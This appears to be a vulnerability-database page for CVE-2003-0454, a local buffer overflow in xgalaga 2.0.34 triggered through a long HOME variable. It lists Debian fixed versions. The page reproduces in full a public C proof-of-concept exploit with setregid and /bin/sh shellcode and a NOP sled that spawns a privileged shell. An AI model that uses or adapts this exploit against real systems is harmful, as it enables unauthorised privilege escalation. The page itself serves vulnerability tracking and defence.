CVE-2003-0454

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Multiple buffer overflows in xgalaga 2.0.34 and earlier allow local users to gain privileges via a long HOME environment variable.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-71 local linux verified text · 1 KB

c0wboy · 2003-07-31

XGalaga 2.0.34 (RedHat 9.0) - Local Game

text exploit Source: Exploit-DB

/* 0x333xgalaga => XGalaga 2.0.34 local game exploit (Red Hat 9.0)
*
* tested against xgalaga-2.0.34-1.i386.rpm
* under Red Hat Linux 9.0
*
* - bug found by Steve Kemp
* - exploit coded by c0wboy @ 0x333
*
* (c) 0x333 Outsider Security Labs / www.0x333.org
*
*/


#include <stdio.h>
#include <string.h>
#include <unistd.h>


#define BIN "/usr/X11R6/bin/xgalaga"
#define SIZE 264

#define RET 0xbffffe2c /* tested against Red Hat Linux 9.0 */
#define NOP 0x90


unsigned char shellcode[] =

/* setregid (20,20) shellcode */
"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
"\xcd\x80"

/* exec /bin/sh shellcode */

"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";


void banner (void);
void memret (char *, int, int, int);


void banner (void)
{
fprintf (stdout, "\n\n --- xgalaga local GAME exploit by c0wboy ---\n");
fprintf (stdout, " --- Outsiders Se(c)urity Labs / www.0x333.org ---\n\n");
}


void memret (char *buffer, int ret, int size, int align)
{
int i;
int * ptr = (int *) (buffer + align);

for (i=0; i<size; i+=4)
*ptr++ = ret;

ptr = 0x0;
}


int main ()
{
int ret = RET;
char out[SIZE];

memret ((char *)out, ret, SIZE-1, 0);

memset ((char *)out, NOP, 33);
memcpy ((char *)out+33, shellcode, strlen(shellcode));

setenv ("HOME", out, 1);

banner ();
execl (BIN, BIN, "-scores", 0x0); // the switch "-scores" is necessary to exploit the game
}

// milw0rm.com [2003-07-31]

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2.0.34-22`
sid	Fixed	`2.0.34-22`
forky	Fixed	`2.0.34-22`
bullseye	Fixed	`2.0.34-22`
bookworm	Fixed	`2.0.34-22`

References

https://security-tracker.debian.org/tracker/CVE-2003-0454

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.